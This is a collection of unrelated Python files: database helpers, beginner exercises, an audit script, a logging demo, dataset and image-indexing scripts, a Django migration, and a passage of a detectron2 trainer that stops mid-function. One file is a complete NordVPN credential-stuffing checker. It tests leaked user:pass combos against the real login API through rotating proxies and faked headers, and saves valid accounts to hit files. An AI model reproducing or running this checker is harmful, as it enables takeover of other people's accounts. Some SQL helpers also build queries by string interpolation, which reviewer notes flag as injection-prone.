                # NOTE(review): the timestamps are interpolated straight into
                # the SQL string — acceptable for trusted internal callers,
                # but parameterised execution would be safer.
                sql_str = 'select docid from video_article where insert_time >= "{}" and insert_time < "{}"'.format(start_time, end_time)
                print(sql_str)
                cursor.execute(sql_str)
                results = cursor.fetchall()
                for docid in results:
                    docid_list.append(docid[0])
        except Exception as e:
            print(e)
            traceback.print_exc()
    return docid_list
def insert_video_quality_result(video_quality_list):
    """
    Persist the static video-quality results to the database.
    :param video_quality_list: list of result dicts (see insert_video_quality)
    :return: None
    """
    logger.info("insert records:{}".format(len(video_quality_list)))
    insert_video_quality(video_quality_list)
def get_videos(start_time, end_time):
    """
    Fetch active video_article rows inserted in [start_time, end_time).
    :return: tuple of row tuples with the columns listed in the query

    NOTE(review): the `limit 22` looks like a leftover debugging cap —
    confirm before using this in production.
    """
    with db.get_cursor(**con_params) as cur:
        sql = '''
        select
        a.mp4_url,
        a.m3u8_url,
        a.docid,
        a.interests,
        a.source_title,
        a.title,
        a.subtitle,
        a.content,
        a.category,
        a.tags,
        a.playersize,
        a.hits,
        a.location_type,
        a.pic_url,
        a.big_image_url,
        a.doc_url,
        a.publish_time,
        a.insert_time,
        a.expire_time,
        a.urls
        from
        recsys.video_article a
        where
        a.status >= 0
        and a.insert_time >= '{}' and a.insert_time < '{}' limit 22
        '''.format(start_time, end_time)
        cur.execute(sql)
        results = cur.fetchall()
        return results
def get_conn():
    """Return the shared module-level pymysql connection, creating it on first use."""
    global conn
    if conn is None:
        conn = pymysql.connect(**con_params)
    return conn
def get_mp4_url_by_doc_id(docid):
    """
    Look up the mp4 URL for a single document.
    :param docid: document id string
    :return: mp4 URL string, or None if the docid is unknown
    """
    mp4url = None
    with db.cursor(get_conn()) as cur:
        # NOTE(review): docid is %-interpolated into the SQL string; prefer
        # cur.execute(sql, (docid,)) if docid can come from untrusted input.
        sql = "select a.mp4_url from recsys.video_article a where a.docid = '%s'" % docid
        cur.execute(sql)
        results = cur.fetchone()
        if results and len(results) >= 1:
            mp4url = results[0]
    return mp4url
def get_doc_by_doc_id(docid):
    """Fetch the core fields of one video article.

    :param docid: document id to look up
    :return: (mp4_url, doc_id, interests, source_title, title, category);
        all six are None when the docid is unknown
    """
    mp4_url, doc_id, interests, source_title, title, category = [None] * 6
    with db.cursor(get_conn()) as cur:
        # Parameterized to prevent SQL injection through docid (was
        # interpolated with the % operator).
        sql = ("select "
               "a.mp4_url,"
               "a.docid,"
               "a.interests,"
               "a.source_title,"
               "a.title,"
               "a.category"
               " from recsys.video_article a where a.docid = %s limit 1")
        cur.execute(sql, (docid,))
        results = cur.fetchone()
        if results and len(results) == 6:
            mp4_url, doc_id, interests, source_title, title, category = results
    return mp4_url, doc_id, interests, source_title, title, category
if __name__ == "__main__":
    # Smoke test: list docids inserted during one day.
    docid_list = get_docid_from_videoarticle('2017-08-08 00:00:00', '2017-08-09 00:00:00')
    print(len(docid_list))
    # Guard the sample access: the previous unconditional docid_list[3]
    # raised IndexError whenever fewer than four rows matched.
    if len(docid_list) > 3:
        print(docid_list[3])
# A company sells the same product to four states, each with its own tax
# rate (MG 7%; SP 12%; RJ 15%; MS 8%).  Read the price and the destination
# state, then print the final price including that state's tax.  For an
# unknown state, print an error message (required by the exercise but
# missing in the previous version, which fell through silently).
print('Informe a sigla referente ao estado(Use maiúsculas)')
estado = str(input('Digite o estado ')).upper()
# float(): prices are not necessarily whole numbers; the previous int()
# rejected decimal input with a ValueError.
valorProduto = float(input('Valor de entrada: '))
# State code -> (display name, tax rate).  A lookup table replaces the
# four near-identical if/elif branches (which also misspelled "Estado").
taxas = {
    'MG': ('Minas Gerais', 0.07),
    'SP': ('São Paulo', 0.12),
    'RJ': ('Rio de Janeiro', 0.15),
    'MS': ('Mato Grosso do Sul', 0.08),
}
if estado in taxas:
    nome, taxa = taxas[estado]
    print('Estado selecionado: {}'.format(nome))
    valorProduto += valorProduto * taxa
    print(valorProduto)
else:
    print('Estado inválido!')
# http://www.practicepython.org/exercise/2014/02/05/02-odd-or-even.html
# Read a number and a divisor, then report parity, divisibility, and
# whether the number is a multiple of 4.
while True:
    try:
        num = int(input("Introduzca un número entero: "))
        divisor = int(input("Introduzca un divisor: "))
        # A zero divisor crashed the original with ZeroDivisionError in
        # the num % divisor test below; re-prompt instead.
        if divisor == 0:
            print("El divisor no puede ser cero ¬¬ ")
            continue
        break
    except ValueError:
        print("Eso no parecen números enteros ¬¬ ")
par = "par" if num % 2 == 0 else "impar"
divisible = "divisible" if num % divisor == 0 else "no divisible"
cuatro = "y es multiplo de 4!" if (num % 4 == 0 and divisor != 4) else ""
print("{} es un número {}, {} entre {} {}".format(num, par, divisible, divisor, cuatro))
|
#!/usr/bin/python26
import sys
import MySQLdb
CONFIG_PATH = '/scripts'
sys.path.append(CONFIG_PATH)
# explictly state what is used from TARDIS codebase, no ``import *``
from db_queries import (AUDIT_SELECT, AUDIT_UPDATE_STATUS, QUERY_ALL,
QUERY_DATA, QUERY_NO_PROXY_DATA, QUERY_PROXY)
from configs import (PROV_DB_HOST, PROV_DB_NAME, PROV_DB_USERNAME,
PROV_DB_PASSWORD, PROV_DB_PORT)
from prov_logging import (log_errors, log_exception, log_info)
from script_tracking import (failed_inserts_audit, notify_support,
track_history_exceptions)
# consider adding context to insert and update "status codes"
#AUDIT_SUCCESS = 1
def insert_audit():
    """Move pending audit rows (status 'N') into the provenance tables.

    Selects every audit row still flagged 'N', picks the insert query that
    matches the row's optional proxy_username / event_data fields, runs it,
    and on success flips the audit row's status to 'Y'.  Every failure is
    logged, recorded via failed_inserts_audit() and reported to support.
    """
    scriptname = "Audit"

    def _insert_and_mark(cursor, row_id, all_data, query_name, query, args):
        # Run one provenance insert; on success mark the audit row processed.
        # This replaces four duplicated copies of the same insert/update/log
        # sequence in the previous version.
        if cursor.execute(query % args) != 1:
            err_msg = "Audit: " + query_name + " query failed" + all_data
            log_errors(err_msg)
            failed_inserts_audit(all_data)
            notify_support(err_msg, scriptname)
            return
        if cursor.execute(AUDIT_UPDATE_STATUS % ('Y', row_id)) == 1:
            log_info("Audit Success: " + all_data)
        else:
            err_msg = ("Audit Update: AUDIT_UPDATE_STATUS query failed" +
                       all_data)
            log_errors(err_msg)
            failed_inserts_audit(all_data)
            notify_support(err_msg, scriptname)

    try:
        conn = MySQLdb.connect(host=PROV_DB_HOST, user=PROV_DB_USERNAME,
                               passwd=PROV_DB_PASSWORD, db=PROV_DB_NAME,
                               port=PROV_DB_PORT)
        cursor = conn.cursor()
    except Exception:
        err_msg = "Audit: Connection failed to Provenance database."
        track_history_exceptions(err_msg)
        notify_support(err_msg, scriptname)
        # The previous version fell through here and then hit a NameError
        # on `cursor`; without a connection there is nothing more to do.
        return
    # Defined up front: the except handler below references all_data, and
    # previously raised NameError when an exception fired before the loop.
    all_data = ""
    try:
        cursor.execute(AUDIT_SELECT % ('N'))
        for row in cursor.fetchall():
            _id = int(row[0])  # `id` is a builtin, hence _id
            uuid = int(row[1])
            service_id = int(row[2])
            category_id = int(row[3])
            event_id = int(row[4])
            username = str(row[5])
            proxy_username = str(row[6])
            event_data = str(row[7])
            request_ipaddress = str(row[8])
            created_date = int(row[9])
            all_data = "{Audit row : " + str(_id) + "}"
            # NOTE(review): str() never returns None, so the `is None`
            # branch below cannot match as written and the "no data" query
            # looks unreachable -- branch order preserved exactly from the
            # original; confirm intended NULL handling with the DB driver.
            if proxy_username is None and event_data is None:
                _insert_and_mark(cursor, _id, all_data, "QUERY_NO_PROXY_DATA",
                                 QUERY_NO_PROXY_DATA,
                                 (uuid, event_id, category_id, service_id,
                                  username, request_ipaddress, created_date))
            elif proxy_username is not None:
                _insert_and_mark(cursor, _id, all_data, "QUERY_PROXY",
                                 QUERY_PROXY,
                                 (uuid, event_id, category_id, service_id,
                                  username, proxy_username,
                                  request_ipaddress, created_date))
            elif event_data is not None:
                _insert_and_mark(cursor, _id, all_data, "QUERY_DATA",
                                 QUERY_DATA,
                                 (uuid, event_id, category_id, service_id,
                                  username, event_data, request_ipaddress,
                                  created_date))
            else:
                _insert_and_mark(cursor, _id, all_data, "QUERY_ALL",
                                 QUERY_ALL,
                                 (uuid, event_id, category_id, service_id,
                                  username, proxy_username, event_data,
                                  request_ipaddress, created_date))
        cursor.close()
    except Exception as e:
        err_msg = "AUDIT EXCEPTION: " + str(e) + ": " + all_data
        log_exception(err_msg)
        failed_inserts_audit(all_data)
        notify_support(err_msg, scriptname)
        cursor.close()
def main():
    """Script entry point: run one audit insert pass.

    Any exception escaping insert_audit() is reported to support rather
    than crashing the script.
    """
    try:
        insert_audit()
    except Exception as e:
        notify_support("insert_audit() was not initialized " + str(e), "Audit")
if __name__ == "__main__":
    main()
|
import json
from helpers import _clear,_setTitle,_printText,_readFile,_getCurrentTime,_getRandomUserAgent,_getRandomProxy,colors
from threading import Thread,active_count, current_thread
from time import sleep
from datetime import datetime
import requests
class Main:
    """NordVPN credential checker: reads user:pass combos, probes the API
    from worker threads, and sorts results into hit/bad/expired files."""
    def __init__(self) -> None:
        """Show the banner and prompt for proxy mode and thread count."""
        _setTitle('[NordVPN]')
        _clear()
        title = colors['bcyan']+"""
  ╔═════════════════════════════════════════════════════════════════════════╗
$$\ $$\ $$\ $$\ $$\ $$$$$$$\ $$\ $$\
 $$$\ $$ | $$ |$$ | $$ |$$ __$$\ $$$\ $$ |
 $$$$\ $$ | $$$$$$\ $$$$$$\ $$$$$$$ |$$ | $$ |$$ | $$ |$$$$\ $$ |
 $$ $$\$$ |$$ __$$\ $$ __$$\ $$ __$$ |\$$\ $$ |$$$$$$$ |$$ $$\$$ |
 $$ \$$$$ |$$ / $$ |$$ | \__|$$ / $$ | \$$\$$ / $$ ____/ $$ \$$$$ |
 $$ |\$$$ |$$ | $$ |$$ | $$ | $$ | \$$$ / $$ | $$ |\$$$ |
 $$ | \$$ |\$$$$$$ |$$ | \$$$$$$$ | \$ / $$ | $$ | \$$ |
 \__| \__| \______/ \__| \_______| \_/ \__| \__| \__|
  ╚═════════════════════════════════════════════════════════════════════════╝
        """
        print(title)
        # Counters shared (unsynchronized) across worker threads.
        self.stop_thread = False
        self.hit = 0
        self.bad = 0
        self.expired = 0
        self.retries = 0
        self.use_proxy = int(input(f'{colors["bcyan"]}[>] {colors["yellow"]}[1]Proxy/[2]Proxyless:{colors["bcyan"]} '))
        self.proxy_type = None
        if self.use_proxy == 1:
            self.proxy_type = int(input(f'{colors["bcyan"]}[>] {colors["yellow"]}[1]Https/[2]Socks4/[3]Socks5:{colors["bcyan"]} '))
        self.threads = int(input(f'{colors["bcyan"]}[>] {colors["yellow"]}Threads:{colors["bcyan"]} '))
        self.session = requests.session()
        print('')
    def _titleUpdate(self):
        """Background loop: refresh the console title with live counters."""
        while True:
            _setTitle(f'[NordVPN] ^| HITS: {self.hit} ^| BAD: {self.bad} ^| EXPIRED: {self.expired} ^| RETRIES: {self.retries}')
            sleep(0.4)
            if self.stop_thread == True:
                break
    def _check(self,user,password):
        """Probe one credential pair against the NordVPN token endpoint.

        NOTE(review): retries recurse into _check with no depth bound; a
        persistently failing proxy could exhaust the stack -- confirm.
        """
        useragent = _getRandomUserAgent('useragents.txt')
        headers = {'User-Agent':useragent,'Content-Type':'application/json','Host':'api.nordvpn.com','Accept':'application/json','DNT':'1','Origin':'chrome-extension://fjoaledfpmneenckfbpdfhkmimnjocfa'}
        proxy = _getRandomProxy(self.use_proxy,self.proxy_type,'proxies.txt')
        payload = {'username':user,'password':password}
        try:
            response = self.session.post('https://api.nordvpn.com/v1/users/tokens',json=payload,proxies=proxy,headers=headers)
            # Codes 100103 and 101301 both mean invalid credentials; the
            # two previously duplicated branches are merged here.
            if "'code': 100103" in response.text or "'code': 101301" in response.text:
                self.bad += 1
                _printText(colors['bcyan'],colors['red'],'BAD',f'{user}:{password}')
                with open('[Results]/bads.txt','a',encoding='utf8') as f:
                    f.write(f'{user}:{password}\n')
            elif 'user_id' in response.text:
                # Valid login: classify by subscription expiry date.
                expires_at = response.json()['expires_at']
                expires_at = datetime.strptime(expires_at,"%Y-%m-%d %H:%M:%S")
                curr_time = datetime.strptime(_getCurrentTime(),"%Y-%m-%d %H:%M:%S")
                if expires_at < curr_time:
                    self.expired += 1
                    _printText(colors['bcyan'],colors['red'],'EXPIRED',f'{user}:{password} [{expires_at}]')
                    with open('[Results]/expireds.txt','a',encoding='utf8') as f:
                        # Fixed: the closing ']' was missing before '\n'.
                        f.write(f'{user}:{password} [{str(expires_at)}]\n')
                else:
                    self.hit += 1
                    _printText(colors['bcyan'],colors['green'],'HIT',f'{user}:{password} [{expires_at}]')
                    with open('[Results]/hits.txt','a',encoding='utf8') as f:
                        f.write(f'{user}:{password}\n')
                    with open('[Results]/detailed_hits.txt','a',encoding='utf8') as f:
                        f.write(f'{user}:{password} [{str(expires_at)}]\n')
            elif '429 Too Many Requests' in response.text:
                # Rate limited: count and retry the same pair.
                self.retries += 1
                self._check(user,password)
            else:
                # Unrecognized response: retry.
                self.retries += 1
                self._check(user,password)
        except Exception:
            # Network/proxy error: retry.
            self.retries += 1
            self._check(user,password)
    def _start(self):
        """Read combos.txt and fan the checks out over worker threads."""
        combos = _readFile('combos.txt','r')
        t = Thread(target=self._titleUpdate)
        t.start()
        threads = []
        for combo in combos:
            run = True
            user = combo.split(':')[0]
            password = combo.split(':')[1]
            # NOTE(review): this is a busy-wait until a thread slot frees
            # up (no sleep) -- preserved as-is.
            while run:
                if active_count()<=self.threads:
                    thread = Thread(target=self._check,args=(user,password))
                    threads.append(thread)
                    thread.start()
                    run = False
        for x in threads:
            x.join()
        print('')
        _printText(colors['bcyan'],colors['yellow'],'FINISHED','Process done!')
if __name__ == '__main__':
    # Build the checker (prompts for settings) and run it.
    checker = Main()
    checker._start()
import logging
from log import log
import submodule
# this is a standard method for creating a logging object
LOG = logging.getLogger(__name__)
if __name__ == '__main__':
    # we set up the logging configuration
    # additionally, the logging.yaml has a console handler, so all logs will be emitted to
    # stdout as well as the file handlers specified
    log.setup_logging('../log/config/logging.yaml', log_dir='./logs')
    # a logging message from the main thread (take note of the first item, should be main.py)
    LOG.info('This is a test log for the main thread')
    # a logging message from the imported module (the first item should be submodule.py)
    submodule.write_info_log('This is an imported INFO log message.')
    # we can also control imported loggers by name
    submodule_logger = logging.getLogger('submodule')
    # before setting the submodule_logger level, we can see that because our global logger
    # is set at INFO, the following DEBUG message won't emit
    submodule.write_debug_log("This won't write anywhere.")
    # but if we set the level of that logger to DEBUG, it will now emit
    submodule_logger.setLevel(logging.DEBUG)
    submodule.write_debug_log('Now this will write out')
    # we can silence all but the most critical messages like this
    submodule_logger.setLevel(logging.CRITICAL)
    submodule.write_critical_log('Oh no! Major malfunction.')
    # We can print all logger objects available through all imported modules
    # I've imported requests here so we can see more loggers
    import requests
    print(log.get_all_loggers())
    # you might notice a my_module logger in there as well -- this is from the log
    # module we import -- if we don't specify a logger name, this defaults to my_module
|
import os
import sys
def setup():
    """Prompt for an input file name and load its lines into fileData.

    Sets the module globals fileHandle and fileData.  Exits the process
    when the file is missing or empty.
    """
    global fileHandle, fileData
    filename = input("Enter an input file name: ")
    path = "./%s" % filename
    # Check existence BEFORE getsize(): getsize() raises OSError on a
    # missing file, which the original hit because it computed both
    # unconditionally.
    if not (os.path.isfile(path) and os.path.getsize(path) > 0):
        print("File doesn't exist or is empty.")
        # The original had a bare `exit` (a no-op expression), so execution
        # continued and later failed on the undefined handle; actually exit.
        sys.exit(1)
    fileData = list()
    with open(path, "r") as fileHandle:
        for entry in fileHandle:
            fileData.append(entry)
def stringsDifferByOne(string1, string2):
    """Return True when the two strings differ at exactly one position.

    Side effect: records that position in the global diffPosn.
    Indexes by string1, so string2 must be at least as long.
    """
    global diffPosn
    mismatches = 0
    for idx, ch in enumerate(string1):
        if ch != string2[idx]:
            mismatches += 1
            if mismatches > 1:
                # Second difference found: cannot be a single-diff pair.
                return False
            diffPosn = idx
    return mismatches == 1
setup()
# Compare every pair of lines; the pair differing at exactly one position
# yields the checksum (their common characters, i.e. the first line with
# the differing character removed).
found = False
for i in range(len(fileData)):
    if found:
        break
    for j in range(i, len(fileData)):
        if stringsDifferByOne(fileData[i], fileData[j]):
            checksum = fileData[i][:diffPosn] + fileData[i][diffPosn+1:]
            print("Checksum:", checksum)
            # The original ended this branch with a bare `exit` (a no-op
            # expression, not a call), so the search never stopped; stop
            # at the first match instead.
            found = True
            break
import cv2
import numpy as np
import matplotlib.pyplot as plt
from glob import glob
from keras.utils import np_utils
from sklearn.datasets import load_files
# Dataset loading helper.
def load_dataset(path, num_classes=133):
    """Load an image-folder dataset via sklearn's load_files.

    :param path: directory whose subdirectories are one class each
    :param num_classes: total class count for one-hot encoding (default
        133, the dog-breed count previously hard-coded here)
    :return: (ndarray of file paths, one-hot encoded target ndarray)
    """
    data = load_files(path)
    dog_files = np.array(data['filenames'])
    dog_targets = np_utils.to_categorical(np.array(data['target']), num_classes)
    return dog_files, dog_targets
# Load the training, validation and test splits.
train_files, train_targets = load_dataset('./dogImages/train')
valid_files, valid_targets = load_dataset('./dogImages/valid')
test_files, test_targets = load_dataset('./dogImages/test')
# Derive all dog breed names from the train subdirectory paths.
# NOTE(review): item[25:-1] assumes a fixed 25-character path prefix,
# which does not match the literal './dogImages/train/' -- confirm
# against the actual glob results.
dog_names = [item[25:-1] for item in glob('./dogImages/train/*/')]
# Print dataset statistics (expected values noted in the comments below).
print('There are %d total dog categories.' % len(dog_names))
# There are 133 total dog categories.
print('There are %s total dog images.\n' % str(len(train_files) + len(valid_files) + len(test_files)))
# There are 8351 total dog images.
print('There are %d training dog images.' % len(train_files))
# There are 6680 training dog images.
print('There are %d validation dog images.' % len(valid_files))
# There are 835 validation dog images.
print('There are %d test dog images.' % len(test_files))
# There are 836 test dog images.
# Visualize a few sample images.
def visualize_img(img_path, ax):
    """Draw the image at img_path onto the given matplotlib axis."""
    bgr_image = cv2.imread(img_path)
    # OpenCV loads BGR; matplotlib expects RGB.
    rgb_image = cv2.cvtColor(bgr_image, cv2.COLOR_BGR2RGB)
    ax.imshow(rgb_image)
# Show the first 12 training images in a 3x4 grid with ticks hidden.
fig = plt.figure(figsize=(20, 10))
for i in range(12):
    ax = fig.add_subplot(3, 4, i + 1, xticks=[], yticks=[])
    visualize_img(train_files[i], ax)
plt.show()
|
# Generated by Django 1.10.5 on 2017-02-15 12:28
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds a domain-wide quota field and normalizes the quota fields on
    # the existing domain/mailbox models (0 always means "no quota").
    dependencies = [
        ('admin', '0009_auto_20170215_0948'),
    ]
    operations = [
        # New: per-domain quota shared between its mailboxes.
        migrations.AddField(
            model_name='domain',
            name='quota',
            field=models.PositiveIntegerField(default=0, help_text='Quota in MB shared between mailboxes. A value of 0 means no quota.'),
        ),
        # Updated help text / verbose name on the default mailbox quota.
        migrations.AlterField(
            model_name='domain',
            name='default_mailbox_quota',
            field=models.PositiveIntegerField(default=0, help_text='Default quota in MB applied to mailboxes. A value of 0 means no quota.', verbose_name='Default mailbox quota'),
        ),
        # Mailbox quota keeps its type; options reset to the plain default.
        migrations.AlterField(
            model_name='mailbox',
            name='quota',
            field=models.PositiveIntegerField(default=0),
        ),
    ]
|
import os
import sys
import glob
import cv2
import numpy as np
import argparse
from timeit import default_timer as timer
'''
Usage :
./db_indexing.py -d "database_name"
Example :
./db_indexing.py -d "base1"
'''
######## Program parameters
parser = argparse.ArgumentParser()
## Database name (the subdirectory of ../Images/ holding the .jpg files)
parser.add_argument("-d", "--database", dest="db_name",
                    help="input image database", metavar="STRING", default="None")
args = parser.parse_args()
## Set paths: images are read from ../Images/<db>/, results go to ./results/<db>_*
img_dir="./../Images/" + args.db_name + "/"
imagesNameList = glob.glob(img_dir+"*.jpg")
output_dir="./results/" + args.db_name
if not os.path.exists(img_dir):
    print "The directory containing images: "+img_dir+" is not found -- EXIT\n"
    sys.exit(1)
# Extract SIFT descriptors from every image; databaseIndex keeps, for each
# descriptor, the 1-based image number and the image path it came from.
start = timer()
databaseDescriptors = []
databaseIndex = []
nbimages = 0
nbdescriptors = 0
for imageName in imagesNameList:
    img = cv2.imread(imageName)
    sift = cv2.xfeatures2d.SIFT_create()
    _, des = sift.detectAndCompute(img,None)
    nbimages = nbimages + 1
    if (des is not None):
        for descriptor in des:
            databaseDescriptors.append(descriptor)
            databaseIndex.append([nbimages,imageName])
            nbdescriptors = nbdescriptors + 1
# NOTE(review): this sample print assumes at least two descriptors were
# collected; an empty/one-descriptor database raises IndexError.
print databaseIndex[1]
# Build a FLANN index over all descriptors (algorithm 0 = linear search).
FLANN_INDEX_ALGO=0
index_params = dict(algorithm = FLANN_INDEX_ALGO) # for linear search
### OpenCV 2.4.13
print index_params
fl=cv2.flann_Index(np.asarray(databaseDescriptors,np.float32),index_params)
end = timer()
print "Indexing time: " + str(end - start)
# Persist descriptors, index table and the FLANN index.
# NOTE(review): assumes ./results/ already exists -- np.save fails otherwise.
np.save(output_dir + "_DB_Descriptors.npy", databaseDescriptors)
np.save(output_dir + "_DB_Index.npy", databaseIndex)
print "Nb Images : " + str(nbimages) + ", Nb Descriptors : "+ str(nbdescriptors)
fl.save(output_dir + "_flan_index-LINEAR.dat")
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
"""
This script is a simplified version of the training script in detectron2/tools.
"""
import os
import random
import numpy as np
import torch
import time
import math
import logging
from collections import defaultdict
import pickle
from fvcore.common.file_io import PathManager
from collections import OrderedDict
from itertools import count
from typing import Any, Dict, List, Set
from detectron2.checkpoint import DetectionCheckpointer
from detectron2.config import get_cfg
from detectron2.data import build_detection_train_loader
from detectron2.engine import DefaultTrainer, default_argument_parser, default_setup, launch
from detectron2.evaluation import COCOEvaluator
from detectron2.solver.build import maybe_add_gradient_clipping
from tsp_rcnn import add_troi_config, DetrDatasetMapper
from tsp_fcos import add_fcos_config
from detectron2.utils.events import EventStorage
from detectron2.utils.logger import setup_logger
import detectron2.utils.comm as comm
from torch.nn.parallel import DistributedDataParallel
from detectron2.modeling.meta_arch import GeneralizedRCNN
from detectron2.modeling import GeneralizedRCNNWithTTA, DatasetMapperTTA
from tsp_rcnn.my_fast_rcnn_output import fast_rcnn_inference_single_image
# Register PASCAL datasets
from tsp_rcnn.fsdet_data.builtin import register_all_pascal_voc
#register_all_pascal_voc()
class HybridOptimizer(torch.optim.Optimizer):
    """Per-parameter-group hybrid of SGD (with momentum) and AdamW.

    Each param group selects its update rule via its "optimizer" key
    ("SGD" or "ADAMW"); groups without the key default to "SGD".
    """
    def __init__(self, params, lr=1e-3, momentum=0, dampening=0, betas=(0.9, 0.999), eps=1e-8, weight_decay=1e-4):
        # Defaults cover both rules: momentum/dampening for SGD,
        # betas/eps for AdamW; lr and weight_decay are shared.
        defaults = dict(lr=lr, momentum=momentum, dampening=dampening,
                        betas=betas, eps=eps, weight_decay=weight_decay)
        super(HybridOptimizer, self).__init__(params, defaults)
    def __setstate__(self, state):
        # On unpickling, older state may lack the "optimizer" key; fall
        # back to SGD for such groups.
        super(HybridOptimizer, self).__setstate__(state)
        for group in self.param_groups:
            group.setdefault("optimizer", "SGD")
    @torch.no_grad()
    def step(self, closure=None):
        """Performs a single optimization step.
        Arguments:
            closure (callable, optional): A closure that reevaluates the model
                and returns the loss.
        """
        loss = None
        if closure is not None:
            with torch.enable_grad():
                loss = closure()
        for group in self.param_groups:
            for p in group['params']:
                if p.grad is None:
                    continue
                if group["optimizer"] == "SGD":
                    # Classic SGD: L2 weight decay folded into the gradient,
                    # then momentum buffer update, then parameter step.
                    weight_decay = group['weight_decay']
                    momentum = group['momentum']
                    dampening = group['dampening']
                    d_p = p.grad
                    if weight_decay != 0:
                        d_p = d_p.add(p, alpha=weight_decay)
                    if momentum != 0:
                        param_state = self.state[p]
                        if 'momentum_buffer' not in param_state:
                            buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()
                        else:
                            buf = param_state['momentum_buffer']
                            buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
                        d_p = buf
                    p.add_(d_p, alpha=-group['lr'])
                elif group["optimizer"] == "ADAMW":
                    # Perform stepweight decay (decoupled, AdamW-style)
                    p.mul_(1 - group['lr'] * group['weight_decay'])
                    # Perform optimization step
                    grad = p.grad
                    if grad.is_sparse:
                        raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')
                    state = self.state[p]
                    # State initialization
                    if len(state) == 0:
                        state['step'] = 0
                        # Exponential moving average of gradient values
                        state['exp_avg'] = torch.zeros_like(p, memory_format=torch.preserve_format)
                        # Exponential moving average of squared gradient values
                        state['exp_avg_sq'] = torch.zeros_like(p, memory_format=torch.preserve_format)
                    exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
                    beta1, beta2 = group['betas']
                    state['step'] += 1
                    bias_correction1 = 1 - beta1 ** state['step']
                    bias_correction2 = 1 - beta2 ** state['step']
                    # Decay the first and second moment running average coefficient
                    exp_avg.mul_(beta1).add_(grad, alpha=1 - beta1)
                    exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1 - beta2)
                    denom = (exp_avg_sq.sqrt() / math.sqrt(bias_correction2)).add_(group['eps'])
                    step_size = group['lr'] / bias_correction1
                    p.addcdiv_(exp_avg, denom, value=-step_size)
                else:
                    raise NotImplementedError
        return loss
class AdetCheckpointer(DetectionCheckpointer):
    """
    Same as :class:`DetectronCheckpointer`, but is able to convert models
    in AdelaiDet, such as LPF backbone.
    """
    def _load_file(self, filename):
        # .pkl files are model-zoo checkpoints: either Detectron2 format
        # (has "model" + "__author__") or Caffe2/Detectron1 "blobs".
        if filename.endswith(".pkl"):
            with PathManager.open(filename, "rb") as f:
                data = pickle.load(f, encoding="latin1")
            if "model" in data and "__author__" in data:
                # file is in Detectron2 model zoo format
                self.logger.info("Reading a file from '{}'".format(data["__author__"]))
                return data
            else:
                # assume file is from Caffe2 / Detectron1 model zoo
                if "blobs" in data:
                    # Detection models have "blobs", but ImageNet models don't
                    data = data["blobs"]
                # Momentum buffers are optimizer state, not weights.
                data = {k: v for k, v in data.items() if not k.endswith("_momentum")}
                if "weight_order" in data:
                    del data["weight_order"]
                return {"model": data, "__author__": "Caffe2", "matching_heuristics": True}
        loaded = super()._load_file(filename)  # load native pth checkpoint
        if "model" not in loaded:
            loaded = {"model": loaded}
        # LPF/DLA checkpoints use different key names; let the loader
        # match them heuristically.
        basename = os.path.basename(filename).lower()
        if "lpf" in basename or "dla" in basename:
            loaded["matching_heuristics"] = True
        return loaded
def append_gt_as_proposal(gt_instances):
    """Use each instance set's ground-truth boxes as its proposals.

    Mutates every element in place: proposal_boxes aliases gt_boxes and
    gt_idxs enumerates them 0..N-1.  Returns the same list for chaining.
    """
    for inst in gt_instances:
        inst.proposal_boxes = inst.gt_boxes
        inst.gt_idxs = torch.arange(len(inst.gt_boxes))
    return gt_instances
class Trainer(DefaultTrainer):
    """DefaultTrainer specialized for this project: per-module optimizer
    selection (SGD vs AdamW), optional transformer-only gradient clipping,
    DETR-style crop mapper, COCO evaluation and TTA testing."""
    def __init__(self, cfg):
        """
        Args:
            cfg (CfgNode):
        """
        # Clip value is honored only for the "full_model" clip type; the
        # clipping itself is applied manually in run_step().
        self.clip_norm_val = 0.0
        if cfg.SOLVER.CLIP_GRADIENTS.ENABLED:
            if cfg.SOLVER.CLIP_GRADIENTS.CLIP_TYPE == "full_model":
                self.clip_norm_val = cfg.SOLVER.CLIP_GRADIENTS.CLIP_VALUE
        DefaultTrainer.__init__(self, cfg)
    def run_step(self):
        # One training iteration: forward, sum losses, backward, optional
        # clipping of transformer parameters, optimizer step.
        assert self.model.training, "[Trainer] model was changed to eval mode!"
        start = time.perf_counter()
        data = next(self._trainer._data_loader_iter)
        data_time = time.perf_counter() - start
        loss_dict = self.model(data)
        losses = sum(loss_dict.values())
        #self._detect_anomaly(losses, loss_dict) # removed with new detectron2
        metrics_dict = loss_dict
        #metrics_dict["data_time"] = data_time
        self._trainer._write_metrics(metrics_dict, data_time)
        self.optimizer.zero_grad()
        losses.backward()
        if self.clip_norm_val > 0.0:
            # Only parameters inside modules whose name contains
            # "transformer" are clipped.
            clipped_params = []
            for name, module in self.model.named_modules():
                for key, value in module.named_parameters(recurse=False):
                    if "transformer" in name:
                        clipped_params.append(value)
            torch.nn.utils.clip_grad_norm_(clipped_params, self.clip_norm_val)
        self.optimizer.step()
    @classmethod
    def build_evaluator(cls, cfg, dataset_name, output_folder=None):
        # COCO-style evaluation; results land in <OUTPUT_DIR>/inference.
        if output_folder is None:
            output_folder = os.path.join(cfg.OUTPUT_DIR, "inference")
        return COCOEvaluator(dataset_name, cfg, True, output_folder)
    @classmethod
    def build_optimizer(cls, cfg, model):
        """
        Build an optimizer from config.

        Each parameter becomes its own param group so that per-module
        learning rates / weight decay / optimizer choice can be applied:
        norm layers get WEIGHT_DECAY_NORM, biases get the bias factors,
        "bottom_up" and "transformer" modules get LR multipliers, and
        transformer parameters are tagged to use AdamW in HybridOptimizer.
        """
        norm_module_types = (
            torch.nn.BatchNorm1d,
            torch.nn.BatchNorm2d,
            torch.nn.BatchNorm3d,
            torch.nn.SyncBatchNorm,
            # NaiveSyncBatchNorm inherits from BatchNorm2d
            torch.nn.GroupNorm,
            torch.nn.InstanceNorm1d,
            torch.nn.InstanceNorm2d,
            torch.nn.InstanceNorm3d,
            torch.nn.LayerNorm,
            torch.nn.LocalResponseNorm,
        )
        params: List[Dict[str, Any]] = []
        memo: Set[torch.nn.parameter.Parameter] = set()
        # Debug aid: list all module names (left in place deliberately).
        for name, _ in model.named_modules():
            print(name)
        for name, module in model.named_modules():
            for key, value in module.named_parameters(recurse=False):
                if not value.requires_grad:
